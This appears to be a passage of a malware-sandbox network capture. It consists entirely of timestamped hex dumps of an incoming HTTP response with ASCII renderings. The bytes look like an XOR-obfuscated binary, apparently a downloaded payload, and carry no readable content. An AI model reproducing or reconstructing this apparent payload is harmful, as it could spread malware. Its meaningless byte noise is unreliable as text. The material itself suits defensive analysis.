                                Data Ascii: d !f(f !f%5e%f 0Be%UdE %fPks`Ukf8!f ufug#`Pf -d] "^)sP44d5\Be%h f !f(f%5e% fXfPf8f8)%%%%)+\%'%%%%%E%%%e%%%^e^Ea%%%-\%%%^5f%%%e%%%^)
                                2022-06-26 07:43:17 UTC631INData Raw: 35 8d 83 91 65 25 68 20 19 66 f0 41 8b 65 25 0d ef b8 da da 9e c4 4d a8 da da c6 0f 66 20 05 3a 83 36 66 c0 38 9e 30 66 11 0e e5 30 8d 68 91 65 25 89 da 55 89 64 45 da e0 a5 0b 1c 25 0e e5 7f 34 34 89 64 35 8d b9 91 65 25 9e c4 17 f1 da da c6 1d 38 9e 66 e5 5e 08 a5 0b 1c 25 dc 9e 8d 0b 1c 25 15 da 25 25 8d 0b 1c 25 cc da 25 25 8d 0b 1c 25 17 da 25 25 8d 0b 1c 25 ce da 25 25 8d 0b 1c 25 19 da 25 25 8d 0b 1c 25 d0 da 25 25 8d 0b 1c 25 1b da 25 25 8d 0b 1c 25 d2 da 25 25 8d 0b 1c 25 1d da 25 25 8d 0b 1c 25 d4 da 25 25 8d 0b 1c 25 1f da 25 25 8d 0b 1c 25 d6 da 25 25 8d 0b 1c 25 21 da 25 25 8d 0b 1c 25 d8 da 25 25 8d 0b 1c 25 23 da 25 25 8d 0b 1c 25 da da 25 25 8d 0b 1c 25 05 da 25 25 8d 0b 1c 25 bc da 25 25 8d 0b 1c 25 07 da 25 25 8d 0b 1c 25 be da 25 25 8d
                                Data Ascii: 5e%h fAe%Mf :6f80f0he%UdE%44d5e%8f^%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%!%%%%%%#%%%%%%%%%%%%%%%%%
                                2022-06-26 07:43:17 UTC632INData Raw: 25 25 25 25 25 f1 4c 65 25 35 25 25 25 4d 4c 65 25 d9 5b 65 25 e5 5b 65 25 e9 5b 65 25 ed 5b 65 25 e1 5b 65 25 59 59 65 25 75 59 65 25 b1 59 65 25 37 20 20 9d 99 40 97 93 3c 91 20 9d 3e 40 95 99 44 4a 93 b5 51 97 65 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 51 97 65 25 35 25 25 25 4d 4c 65 25 d9 5b 65 25 e5 5b 65 25 e9 5b 65 25 ed 5b 65 25 e1 5b 65 25 59 59 65 25 75 59 65 25 b1 59 65 25 e4 20 24 93 99 20 97 97 4a 97 66 e5 a9 97 65 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 a9 97 65 25 35 25 25 25 05 4c 65 25 d9 5b 65 25 e5 5b 65 25 e9 5b 65 25 ed 5b 65 25 e1 5b 65 25 59 59 65 25 75 59 65 25 b1 59 65 25 2f 20 69 44 9b 67 54 7f 40 97 4a b5 01 97 65 25 25 25 25 25 25 25
                                Data Ascii: %%%%%Le%5%%%MLe%[e%[e%[e%[e%[e%YYe%uYe%Ye%7 @< >@DJQe%%%%%%%%%%%%%%%%%%%%%%%%%%%%%Qe%5%%%MLe%[e%[e%[e%[e%[e%YYe%uYe%Ye% $ Jfe%%%%%%%%%%%%%%%%%%%%%%%%%%%%%e%5%%%Le%[e%[e%[e%[e%[e%YYe%uYe%Ye%/ iDgT@Je%%%%%%%
                                2022-06-26 07:43:17 UTC634INData Raw: d9 5b 65 25 e5 5b 65 25 e9 5b 65 25 ed 5b 65 25 e1 5b 65 25 59 59 65 25 75 59 65 25 b1 59 65 25 33 20 2e 99 3c 3e 46 2a 9b 40 97 8b 91 4a 52 b5 95 52 65 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 95 52 65 25 35 25 25 25 4d 4c 65 25 d9 5b 65 25 e5 5b 65 25 e9 5b 65 25 ed 5b 65 25 e1 5b 65 25 59 59 65 25 75 59 65 25 b1 59 65 25 e4 20 1e 4a 93 99 97 4a 91 1e 66 e5 ed 52 65 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 ed 52 65 25 31 25 25 25 d5 4a 65 25 d9 5b 65 25 e5 5b 65 25 e9 5b 65 25 ed 5b 65 25 e1 5b 65 25 59 59 65 25 75 59 65 25 b1 59 65 25 e8 20 7b 3c 97 44 3c 93 99 20 97 97 4a 97 66 e5 49 9d 65 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25
                                Data Ascii: [e%[e%[e%[e%[e%YYe%uYe%Ye%3 .<>F*@JRRe%%%%%%%%%%%%%%%%%%%%%%%%%%%%%Re%5%%%MLe%[e%[e%[e%[e%[e%YYe%uYe%Ye% JJfRe%%%%%%%%%%%%%%%%%%%%%%%%%%%%%Re%1%%%Je%[e%[e%[e%[e%[e%YYe%uYe%Ye% {<D< JfIe%%%%%%%%%%%%%%%%%%%%%%%%
                                2022-06-26 07:43:17 UTC635INData Raw: 32 2e 64 eb 64 b2 e4 e5 99 de 66 65 21 e4 f7 99 de 66 77 21 64 9c 14 ac 9b 27 64 ac 14 a4 ce cb 99 4f af 83 da a5 d6 3c 97 2d a5 d6 9f 52 de a5 c6 45 af 5a da a5 da 3c 97 2d a5 da 9f 52 de a5 ca 45 5d d6 99 fd ea db 9e ea db b2 04 f5 36 3a 83 9e b5 14 f5 99 f4 e4 e5 99 f2 e4 f7 99 39 66 6d 21 16 6f 21 50 31 0d 6e da da da 60 e5 50 de d5 dc 9e 0c e5 9e b5 2e 7b 66 17 66 fd 66 eb 0d f2 eb da da 75 66 eb 0d ea ed da da 75 66 9e 0d e2 eb da da 75 66 9e 0d da a2 da da 75 8f 25 8d 25 29 25 25 0d 87 0b da da 5e 0d 27 83 36 9e 2e 7b 66 17 66 fd 66 eb 0d ba a0 da da 75 66 eb 0d b2 a2 da da 75 66 9e 0d aa a0 da da 75 66 9e 0d a2 a2 da da 75 8f dc 8d 25 29 25 25 0d 4f 0b da da 5e 0d 27 83 36 9e 2e 7b 66 17 66 fd 66 fb 66 9e 0d 94 da da da 60 e5 ea b9 e5 83 36 9e b5
                                Data Ascii: 2.ddfe!fw!d'dO<-REZ<-RE]6:9fm!o!P1n`P.{fffufufufu%%)%%^'6.{fffufufufu%)%%O^'6.{ffff`6
                                2022-06-26 07:43:17 UTC636INData Raw: 9c 1c 25 75 66 29 90 6d 9c 1c 25 75 66 a2 0d 0a 9e da da 75 0d 94 bc da da 3a 83 36 9e b5 2e 66 fd 8f 25 8d a5 25 25 25 8f 27 8f 25 8f 25 8d 25 25 25 e5 66 9e 0d 2d 9e da da 75 0d b7 bc da da 36 9e 0d b2 da da da 9e 66 e5 2e 7b 32 2c 66 d4 66 17 66 fd 8f 25 68 69 49 29 75 32 7b 2e 0d a2 07 da da 60 e5 50 e2 a2 29 49 da da da da 66 29 49 7f 3a 83 36 9e 2e 7b 32 2c 66 d4 66 17 66 fd 8f 25 68 69 49 29 75 32 7b 2e 0d fe be da da 60 e5 50 e2 a2 29 49 da da da da 66 29 49 7f 3a 83 36 9e 30 66 11 5e e9 1d 2e 7b 66 17 66 fd 66 20 2d 64 20 1d 66 20 31 64 20 21 7b 68 20 21 75 66 20 1d 75 2e 0d 74 07 da da 64 20 1d 66 20 1d 66 30 21 83 36 34 34 38 e7 2d 25 75 0d ef 05 da da 9e b5 30 66 11 5c e9 d9 23 da da 2e 66 fd 68 60 d9 23 da da 75 66 9e 0d 6b e7 da da 75 0d 4d
                                Data Ascii: %uf)m%ufu:6.f%%%%'%%%%%f-u6f.{2,fff%hiI)u2{.`P)If)I:6.{2,fff%hiI)u2{.`P)If)I:60f^.{fff -d f 1d !{h !uf u.td f f0!6448-%u0f\#.fh`#ufkuM
                                2022-06-26 07:43:17 UTC638INData Raw: 0c e5 64 20 21 de 28 35 64 58 1d 0c e5 64 20 19 64 20 15 64 20 11 e4 f7 99 e8 14 f3 99 e4 d1 61 00 99 33 cf 6f 50 ce 64 1d 06 20 1d c4 fe de 25 25 14 f3 99 17 d1 61 00 99 c4 68 83 23 64 38 0d ad 20 c2 61 08 50 e0 14 f3 99 01 d1 0d a3 25 25 25 61 5f 50 2f 64 38 19 14 f3 99 a6 d1 c6 bc 64 38 05 96 da da da da 61 53 50 2f 14 f3 99 dd d1 0d 7f 25 25 25 64 38 01 64 50 fd 2c 77 0d 70 25 25 25 7f 66 38 05 04 a6 4e 27 0c b6 a5 58 c2 08 50 2f 04 ef 4e 29 dc ac 0c f7 ce c9 62 b4 04 ef 4e 29 dc ac 0c f7 d5 45 ce cf 62 b4 04 ef 4e 29 dc ac 0c f7 ce c9 5e 58 15 25 99 2f 77 68 20 15 0d 41 da da da 7f 34 66 50 fd c4 22 da da da 0c b6 61 4f 99 47 61 55 97 18 61 14 52 14 44 b6 2f 25 25 25 51 55 ea db e5 dc 9e 14 f3 99 de d1 c6 09 7d c4 55 da da da 66 20 19 16 20 2d 5a 37
                                Data Ascii: d !(5dXd d d a3oPd %%ah#d8 aP%%%a_P/d8d8aSP/%%%d8dP,wp%%%f8N'XP/N)bN)EbN)^X%/wh A4fP"aOGaUaRD/%%%QU}Uf -Z7
                                2022-06-26 07:43:17 UTC639INData Raw: 25 ad 20 17 a2 20 11 25 25 25 25 dd ee 25 25 25 a5 d4 25 50 f2 66 20 31 5e 1d 27 58 e0 dd 27 25 25 25 5e 1d 37 a3 e0 dd 37 25 25 25 64 20 31 75 dd ea 02 25 25 a5 58 35 27 97 de 66 20 2d 75 68 20 f9 0d 38 27 25 25 66 58 21 ea 92 20 f9 08 da 5a 25 25 5e 1d 27 4e 3f 64 9c 0d 95 25 25 25 68 d9 24 e5 b1 65 25 de 50 11 94 de 25 25 25 ce c9 c6 08 68 50 b2 ea db 38 35 a5 d6 dc 99 35 a5 d6 29 52 e4 ea 9a 20 f9 16 20 31 a3 27 8e 25 68 41 78 d1 b1 65 25 de 38 11 66 f6 de 38 11 da ae 64 1d 06 20 21 36 83 3a c4 cc dc 25 25 b4 b1 65 25 10 68 65 25 91 68 65 25 91 68 65 25 fb 68 65 25 24 73 6b 73 1c 73 d1 2d e5 50 de d5 55 73 9e a5 58 fb 25 99 de d5 08 cf 9e 0d cc da da da ea 9a 28 f9 0c f7 16 28 31 5a f8 5e d4 d8 a1 3d e4 a4 5a 3f d5 55 cf a5 63 25 99 5f af 20 d6 cf d2
                                Data Ascii: % %%%%%%%%Pf 1^'X'%%%^77%%%d 1u%%X5'f -uh 8'%%fX! Z%%^'N?d%%%h$e%P%%%hP855)R 1'%hAxe%8f8d !6:%%e%he%he%he%he%$skss-PUsX%((1Z^=Z?Uc%_
                                2022-06-26 07:43:17 UTC640INData Raw: da 36 a5 da 08 50 27 b4 05 a5 d6 25 99 29 ba 1a c6 27 b6 1a 76 ba 05 8b 84 e4 25 50 2b d5 dc c6 29 b8 fd 0c e5 76 b6 07 b4 48 1d 76 c6 7b d1 2d e5 99 29 61 45 99 d2 73 9e 0c e5 0c f7 d1 51 5f 29 2f 4e ea ff e8 a1 9c 1c 25 64 20 19 ff 20 19 67 c6 0f 73 9e 0c e5 0c f7 af 33 a5 d4 06 99 e0 a5 d4 08 50 dc 6b af 2b 51 5f 29 2f 4e 33 6b 46 f7 2f dc e7 5c 1f 19 dc 25 25 97 0f a5 d4 08 50 27 d2 ff 9e 36 83 3a 66 c0 38 9e 30 66 11 5e e9 e5 2e 66 fd 8f 25 8f ea 8f 25 68 30 2d 68 20 e5 0e a4 0d f5 d4 da da 66 ed 68 30 e5 66 9e 0d 31 8a da da 36 66 c0 38 e7 31 25 b5 30 66 11 5e e9 e5 2e 66 fd 8f 25 8f 25 8f 25 68 30 2d 68 20 e5 8c dc 0d c5 d4 da da 66 ed 68 30 e5 66 9e 0d 01 d3 da da 36 66 c0 38 e7 2d 25 b5 2e 7b 66 17 66 fd 66 9e 0d 72 d7 da da 66 fb 0e a4 0d 9b 23
                                Data Ascii: 6P'%)'v%P+)vHv{-)aEsQ_)/N%d gs3Pk+Q_)/N3kF/\%%P'6:f80f^.f%%h0-h fh0f16f81%0f^.f%%%h0-h fh0f6f8-%.{fffrf#
                                2022-06-26 07:43:17 UTC642INData Raw: 66 ff 60 b6 99 3f 66 30 2d 66 b7 21 23 da da 66 28 2d 68 b9 ec 25 da da da 66 a6 0d fb b9 da da 66 20 2d dc bd 21 23 da da 36 38 9e 66 e5 30 66 11 2e 66 fd 66 20 2d 75 66 9e 0d d2 86 da da 66 f5 66 9e 0d c7 da da da 34 36 38 9e 66 e5 30 66 11 5e e9 05 2e 7b 66 17 66 fd 66 20 2d 75 8f 29 64 50 05 eb 20 09 25 64 38 0d eb 20 11 25 68 20 05 75 8f dc 94 b1 9c 1c 25 68 20 15 df 35 25 25 25 0d d9 ca da da 66 f5 68 20 15 0d 7f da da da 34 83 36 66 c0 38 9e 68 65 25 30 66 11 2c 66 20 2d 5e e5 21 66 35 64 30 21 c6 27 da 25 66 35 af 37 66 28 2d 5f 2c d6 99 17 66 25 06 20 21 65 66 30 2d 64 67 19 34 38 9e 66 e5 30 66 11 66 20 2d a5 9d c8 25 50 4f 66 20 2d 66 65 2d da 95 31 da 95 2d 66 20 2d 68 6d 13 66 20 2d 68 75 15 66 20 2d 5e e5 17 0d 70 23 da da 66 20 2d eb 65 c8
                                Data Ascii: f`?f0-f!#f(-h%ff -!#68f0f.ff -ufff468f0f^.{fff -u)dP %d8 %h u%h 5%%%fh 46f8he%0f,f -^!f5d0!'%f57f(-_,f% !ef0-dg48f0ff -%POf -fe-1-f -hmf -huf -^p#f -e
                                2022-06-26 07:43:17 UTC643INData Raw: 25 0d ca 1f da da 34 c4 ed e0 25 25 30 0d 0a d6 da da 34 30 0d 7d d6 da da 34 66 20 2d 75 30 68 30 fd 66 20 19 0d 9a d6 da da 34 66 20 fd 0d c7 1f da da 34 c4 76 e0 25 25 30 0d 27 d6 da da 34 30 0d 06 d6 da da 34 66 20 2d 75 30 68 30 f9 66 20 19 0d 23 21 da da 34 66 20 f9 0d 50 1f da da 34 c4 93 e0 25 25 30 0d b0 1f da da 34 30 0d 23 1f da da 34 66 20 19 6d 5e 0d 27 97 29 99 3d c6 55 66 20 2d 75 ea 92 20 15 66 30 19 0d 89 1f da da 34 c4 18 e0 25 25 66 20 2d 75 ea 92 20 15 66 29 60 d1 0b 1c 25 0d 4f 1f da da 34 c4 fe e0 25 25 66 20 2d 75 ea 92 20 15 66 29 60 01 0b 1c 25 0d 35 1f da da 34 c4 e4 e0 25 25 30 0d 95 1f da da 34 66 20 19 6d 5e 0d 27 97 2f 99 00 6d 99 24 6d 99 48 c6 5a 30 0d ab 1f da da 34 66 20 2d 75 ea 92 20 13 66 30 19 0d d4 d4 da da 34 c4 f7
                                Data Ascii: %4%%040}4f -u0h0f 4f 4v%%0'404f -u0h0f #!4f P4%%040#4f m^')=Uf -u f04%%f -u f)`%O4%%f -u f)`%54%%04f m^'/m$mHZ04f -u f04
                                2022-06-26 07:43:17 UTC644INData Raw: 66 20 2d 75 dd c1 0b 1c 25 df dc 25 25 25 0d 00 d0 da da 34 c6 40 66 2b 64 20 01 c6 fa 66 2b af 25 00 da 25 25 25 ea 7e e0 3d 9c 1c 25 4e e6 66 2b 0d 6b f8 25 25 64 2b c6 27 da 2b 66 2b a5 5d 25 99 e4 66 2b af 25 5f 20 d6 50 ac 66 20 2d 75 66 3b 06 30 01 66 20 01 0d b6 19 da da 34 66 2b a5 5d 25 99 3b da 2b c6 37 66 20 2d 75 68 20 d6 df dc 25 25 25 0d e3 19 da da 34 66 2b a5 5d 25 ea 60 ff 1d da da 66 20 2d da ad 1d 23 da da 0e e5 7f 34 34 89 64 35 8d f0 c7 65 25 68 20 f9 df 27 25 25 25 0d 1a c3 da da 9e c4 4c 72 da da c6 c6 3a 83 36 66 c0 38 9e 1c 28 0a 75 28 25 25 25 1c 0a 75 25 1c 28 75 28 25 25 25 25 1c 1c 1c 1c 25 25 25 25 1c 1c 1c 25 45 25 25 25 30 66 11 5c e9 1d 23 da da 2e 7b 66 ff 66 15 0e e5 64 60 21 23 da da 0e e5 64 60 1d 23 da da 60 b6 99 e6
                                Data Ascii: f -u%%%%4@f+d f+%%%%~=%Nf+k%%d+'+f+]%f+%_ Pf -uf;0f 4f+]%;+7f -uh %%%4f+]%`f -#44d5e%h '%%%Lr:6f8(u(%%%u%(u(%%%%%%%%%E%%%0f\#.{ffd`!#d`#`
                                2022-06-26 07:43:17 UTC646INData Raw: 13 8b 66 20 17 8b 64 20 11 c6 5b 8b 66 58 15 af 20 c4 ad 20 0d 8b 66 20 17 8b 64 20 13 8b 66 20 19 8b 64 20 11 c6 3f 8b 66 58 19 af 20 c6 ad 20 0d 8b 66 20 17 8b 64 20 13 8b 66 20 15 8b 64 20 11 5e 58 21 25 a3 33 30 ea 92 a2 0d e2 23 da da 34 66 1d c6 95 a5 58 0d 27 52 8f 0d 46 ca da da ea 92 ed ea 92 e0 09 e5 1c 25 06 ed 66 9c 2c 94 89 25 25 25 74 d2 d4 34 8b 46 e5 89 8b de 1d 8b 5e 18 09 e5 1c 25 25 9b 61 ea 92 a2 16 ed a3 10 8b 5e a2 89 c6 0a 0d 55 ca da da 66 1d a5 58 1b dc 50 37 8b 66 20 19 8b 64 20 11 8b 66 20 17 8b 64 20 13 c6 35 8b 66 20 19 8b 64 20 13 8b 66 20 17 8b 64 20 11 66 ae af e8 6c 0b 1c 25 66 eb 0d 3e 21 da da 66 ae 66 eb 0d 3b d6 da da a5 18 79 c2 1c 25 25 ea a9 8e 25 25 25 66 f0 b9 0b 1c 25 dd d5 cd 65 25 0d f4 c3 da da 60 e5 ea a9 76
                                Data Ascii: f d [fX f d f d ?fX f d f d ^X!%30#4fX'RF%f,%%%t4F^%%a^UfXP7f d f d 5f d f d fl%f>!ff;y%%%%%f%e%`v
                                2022-06-26 07:43:17 UTC647INData Raw: da da 66 9e 0d d4 b9 da da c6 e4 66 9e 66 fb 0d 77 b9 da da 83 36 66 c0 38 e7 29 25 66 e5 2e 7b 32 2c 66 b4 66 17 66 1d 8f 27 68 69 49 29 75 7b 32 0d 29 dd da da 60 e5 a3 e0 af 29 49 c6 27 66 9e 7f 3a 83 36 9e 30 66 11 2c 2e 7b 32 64 28 21 66 1f 66 15 66 38 2d 2e 66 20 35 66 65 21 0e a4 66 fb 0d 46 da da da 5e 16 25 50 e8 66 20 21 66 29 dd 66 ae 0d 58 d7 da da 3a 83 36 34 38 e7 2d 25 b5 30 66 11 0e a4 2c 2c 2c 2c 2c 2c 2e 7b 32 0e e5 30 8d 86 88 65 25 89 da 55 89 64 45 0d a2 92 da da 64 20 21 96 dc 25 25 25 e3 d5 0b 1c 25 9a 05 0b 1c 25 30 8f e6 68 20 19 75 94 b5 9c 1c 25 66 ae 6f 68 1e 69 6d 0d 54 da da da 34 66 30 19 66 eb 0d b3 6e da da 30 8f e6 68 20 15 75 94 e5 9c 1c 25 66 ae 6f 68 1e 5d 6d 0d 7b da da da 34 66 30 15 66 a2 0d 46 6e da da 1e 5e a2 29
                                Data Ascii: fffw6f8)%f.{2,fff'hiI)u{2)`)I'f:60f,.{2d(!fff8-.f 5fe!fF^%Pf !f)fX:648-%0f,,,,,,.{20e%UdEd !%%%%%0h u%fohimT4f0fn0h u%foh]m{4f0fFn^)
                                2022-06-26 07:43:17 UTC648INData Raw: 7b 0d a6 8e da da 5c 98 01 21 da da 25 35 25 25 50 41 8d e0 dc 25 25 68 60 0f d8 da da 75 66 60 f5 21 da da 75 0d 9a d7 da da 60 e5 50 fe 8d e0 dc 25 25 68 60 0f d8 da da 75 7c 8d 0b 1c 25 75 0d c9 d7 da da 66 eb 0d 68 da da da 64 20 19 c6 e4 06 90 f5 21 da da 64 50 19 68 60 0f d8 da da d7 81 0d b7 33 25 25 66 f5 67 68 60 ca 23 da da 94 29 dc 25 25 0d 22 ae da da dd 09 d7 65 25 64 20 21 dd 09 d7 65 25 64 20 1d 66 9e 66 f0 d5 4a 65 25 0d 53 a9 da da a9 e5 99 04 66 1e 29 0d fb b7 da da 64 20 21 66 20 21 0d c6 f7 da da 60 e5 99 37 66 30 21 a5 a1 27 da 53 99 2d dd 0d d7 65 25 64 20 1d 8d 25 dc 25 25 68 60 0f 21 da da 75 7c 5d f5 1c 25 66 65 29 75 7c 8d 0b 1c 25 0d d3 7c da da 75 0d 75 8e da da 68 70 c9 d6 da da 66 de 0d 8a 5c da da 68 60 c9 d6 da da 64 60 c9
                                Data Ascii: {\!%5%%PA%%h`uf`!u`P%%h`u|%ufhd !dPh`3%%fgh`#)%%"e%d !e%d ffJe%Sf)d !f !`7f0!'S-e%d %%%h`!u|]%fe)u|%|uuhpf\h`d`
                                2022-06-26 07:43:17 UTC650INData Raw: da da 66 20 21 64 20 09 eb 20 0d e6 64 50 11 eb 20 15 e6 64 58 19 eb 20 1d 25 68 20 09 75 8f 27 68 30 05 7c 0d aa 1c 25 0d f2 cd da da 66 28 05 d7 dc 7c fd 52 65 25 0d 11 21 da da 66 fd 0e e5 7f 34 34 89 64 35 8d 06 92 65 25 68 20 05 0d e8 64 da da 68 20 21 0d e0 64 da da 9e c4 36 a7 da da c6 0d 66 9e 3a 83 36 66 c0 38 9e 64 f1 64 39 49 66 48 25 c4 56 a7 da da 9e 66 e5 30 66 11 0d 61 da da da 68 28 2d 5e 9c 29 66 30 2d 0d ff da da da 38 e7 29 25 66 e5 66 e8 e1 f3 1c 25 d7 dc 7c 5d 9d 65 25 0d 23 21 da da 0d 20 a7 da da 9e 66 25 18 b7 25 25 e5 5a 51 99 34 18 b3 25 25 e5 5a f0 99 2e 08 e0 25 25 e5 99 30 08 62 25 25 25 99 61 6d 99 6d c6 30 e0 4c da da 1a 5e 0d 27 97 0e 99 12 c6 22 18 bb 25 25 e5 5a ec 99 10 08 6e 25 25 e5 99 4d 6d 99 ee 6d 99 3b c6 0a 08 d8
                                Data Ascii: f !d dP dX %h u'h0|%f(|Re%!f44d5e%h dh !d6f:6f8dd9IfH%Vf0fah(-^)f0-8)%ff%|]e%#! f%%%ZQ4%%Z.%%0b%%%amm0L^'"%%Zn%%Mmm;
                                2022-06-26 07:43:17 UTC651INData Raw: 94 a5 25 25 25 0d 48 ab da da 5c e9 b9 25 25 25 9e 66 e5 7b 32 66 1f 0e f7 60 e5 99 8b a5 61 5d 25 99 85 60 da 50 39 af 25 00 da 25 25 25 ea 7e e0 3d 9c 1c 25 4e 71 d7 dc c6 6d 66 d2 73 c6 dc 73 60 1b a1 37 af 31 55 5c bc da 25 25 25 ea 7e e8 3d 9c 1c 25 97 c4 66 aa 06 f3 5c bc dc 25 25 a5 54 e0 24 5e a4 23 1c 60 a4 50 29 d7 27 c6 ee af 29 5d 00 da 25 25 25 ea 7e e0 3d 9c 1c 25 4e 27 d7 dc 66 e7 3a 83 9e 68 65 25 2e 7b 66 17 66 fd 0e e5 a5 18 79 c2 1c 25 25 99 ea 66 9e 0d 49 ad da da 66 fb 6f 0d 8d da da da 83 36 9e b5 0e a4 a5 18 79 c2 1c 25 25 99 e2 0d 79 da da da 66 ed 66 9c 9e 68 65 25 2e 7b 66 17 66 fd 66 9e 0d ce 60 da da 16 15 a3 e4 66 9e 0d 0d 60 da da 66 15 66 fb 66 9e 0d e0 25 25 25 83 36 9e 66 e5 2e 7b 32 30 66 1f 66 15 0e c8 60 da a3 6b 66 eb
                                Data Ascii: %%%H\%%%f{2f`a]%`P9%%%%~=%Nqmfss`71U\%%%~=%f\%%T$^#`P)')]%%%~=%N'f:he%.{ffy%%fIfo6y%%yffhe%.{fff`f`fff%%%6f.{20ff`kf
                                2022-06-26 07:43:17 UTC652INData Raw: 7c 6d c2 1c 25 0d 99 da da da 75 0d 9b c7 da da 0e 1b c6 04 af 69 12 2b af 81 12 e2 4f fd 97 3f 1e ad 20 da af 20 da 00 da 25 25 25 ea 86 e0 3d 9c 1c 25 23 20 da 23 a6 50 0f 5e eb 27 5e 23 31 58 2f af 69 12 2b 2f 69 12 e2 50 ed 3a 83 36 34 38 9e 7c 71 c2 1c 25 5e 1d fa 52 e2 ea 7e e0 35 9e 1c 25 ea b7 e5 9e 68 65 25 30 66 11 5c e9 89 23 da da 2e 7b 32 a2 e0 6d c2 1c 25 e4 29 25 25 a2 e0 71 c2 1c 25 e4 25 25 25 a2 e0 75 c2 1c 25 dc 25 25 25 0d 48 c7 da da 60 e5 99 e0 7e 6d c2 1c 25 8b 60 e5 99 f6 66 f5 8b 5c 07 da de ea 92 f7 64 f0 71 c2 1c 25 ea 92 e5 9c 0d 2f 7e 75 c2 1c 25 e3 61 9e 65 25 9a 3d 9c 1c 25 94 2d 25 25 25 ce 80 5e 18 f5 e5 1c 25 27 ea 60 88 25 25 25 0d 48 da da da a9 e5 99 ee eb e0 30 c2 1c 25 25 eb e0 79 c2 1c 25 25 c4 9a 25 25 25 30 0d 15
                                Data Ascii: |m%ui+O? %%%=%# #P^'^#1X/i+/iP:648|q%^R~5%he%0f\#.{2m%)%%q%%%%u%%%%H`~m%`f\dq%/~u%ae%=%-%%%^%'`%%%H0%%y%%%%%0
                                2022-06-26 07:43:17 UTC654INData Raw: 25 da 00 59 ce 1c 25 66 e5 30 66 11 5e e9 11 2e 0e e5 64 20 11 0e e5 30 8d 91 a2 65 25 89 da 55 89 64 45 0d 20 78 da da 66 fd 60 b6 99 12 64 38 15 eb 20 19 25 68 30 11 66 9e 0d af 09 da da 66 20 11 64 20 1d eb 20 21 e6 68 20 15 75 8f dc 66 e8 cd aa 1c 25 d7 dc 7c 15 9d 65 25 0d 9d c8 da da 66 f5 c6 39 66 e8 45 f5 1c 25 d7 dc 7c 15 9d 65 25 0d 4b c8 da da 66 f5 64 7f 31 66 e7 0d 8b 97 da da 0e e5 7f 34 34 89 64 35 8d 4e a2 65 25 68 20 11 0d 98 9d da da 9e c4 ee 97 da da c6 15 36 66 c0 38 9e 2e 66 fd 60 b6 50 e0 0d 7d da da da 66 9e 36 9e 2e 7b 2c 96 39 9e 1c 25 66 19 c6 3b 66 de 64 2b 66 2b 66 25 64 de df 2d 25 25 25 66 2b 0d 5f 87 da da 5e 16 25 50 c0 7f 83 36 9e b5 2e 8d 11 a2 65 25 0d 7c c1 da da 66 fd 60 b6 99 35 8d 21 a2 65 25 2e 0d bd c1 da da 7e 61
                                Data Ascii: %Y%f0f^.d 0e%UdE xf`d8 %h0ff d !h uf%|e%f9fE%|e%Kfd1f44d5Ne%h 6f8.f`P}f6.{,9%f;fd+f+f%d-%%%f+_^%P6.e%|f`5!e%.~a
                                2022-06-26 07:43:17 UTC655INData Raw: da da 66 29 49 da 6d 31 66 29 49 5e 9d 31 25 50 6d 66 f9 66 1e 45 0d e4 d8 da da 0d e9 72 da da 16 1e 49 99 59 68 1e 31 0d 92 d6 da da 66 ed 5c d4 da da 25 25 50 e4 66 9e 0d 43 23 da da c6 f4 60 a4 5a f0 66 9c 94 da da 25 25 74 d2 d4 60 f7 50 e2 66 9e 0d de 23 da da 7f 36 9e 66 35 0e a4 64 2d 66 e7 0d e2 8d da da 9e 66 e5 30 66 11 5e e9 19 2e 66 fd 77 0d 2c bd da da 64 20 19 0e e5 30 8d 2f a8 65 25 89 da 55 89 64 45 b4 58 23 0e e5 30 8d 11 f1 65 25 89 da 55 89 64 45 66 9e 0d 3d 9d da da 75 0d ef 72 da da 64 20 1d 0e e5 7f 34 34 89 64 35 8d ce f1 65 25 b6 07 b4 48 23 9e c4 6e 91 da da c6 ce 0e e5 7f 34 34 89 64 35 8d ec a8 65 25 66 20 19 75 0d ca 72 da da 9e c4 50 91 da da c6 ca 66 20 1d 36 66 c0 38 9e 68 65 25 f8 25 25 25 31 9e 1c 25 b1 aa 1c 25 29 9e 1c
                                Data Ascii: f)Im1f)I^1%PmffErIYh1f\%%PfC#`Zf%%t`Pf#6f5d-ff0f^.fw,d 0/e%UdEX#0e%UdEf=urd 44d5e%H#n44d5e%f urPf 6f8he%%%%1%%)
                                2022-06-26 07:43:17 UTC656INData Raw: 65 dd 41 a8 65 25 0d 45 91 da da dd 2d f3 65 25 0d 63 91 da da a5 18 40 0b 1c 25 25 99 ea dd 5d 9c 1c 25 df 0d ac 65 25 0d ef 93 da da 0d e4 c4 da da 0d 2d 0f da da 0d ce d0 da da 0d bb cc da da 0e e5 7f 34 34 89 64 35 8d b6 ac 65 25 9e c4 86 42 da da c6 1d 38 9e 25 25 25 da da da da 27 25 25 25 55 9d 25 25 2e 7b 66 17 66 fd 16 ce 58 33 66 9e 06 eb 0d b4 81 da da de eb 83 36 9e 66 eb 06 9e 0d a6 81 da da de 9e 83 36 9e 66 e5 30 66 11 0e e5 30 8d 14 f7 65 25 89 da 55 89 64 45 da e0 cd c2 1c 25 0e e5 7f 34 34 89 64 35 8d 65 f7 65 25 9e c4 6b 42 da da c6 1d 38 9e 66 e5 5e 08 cd c2 1c 25 dc 9e 30 66 11 0e e5 30 8d 4c f7 65 25 89 da 55 89 64 45 da e0 d1 c2 1c 25 0e e5 7f 34 34 89 64 35 8d 9d f7 65 25 9e c4 33 42 da da c6 1d 38 9e 66 e5 5e 08 d1 c2 1c 25 dc 9e
                                Data Ascii: eAe%E-e%c@%%]%e%-44d5e%B8%%%'%%%U%%.{ffX3f6f6f0f0e%UdE%44d5ee%kB8f^%0f0Le%UdE%44d5e%3B8f^%
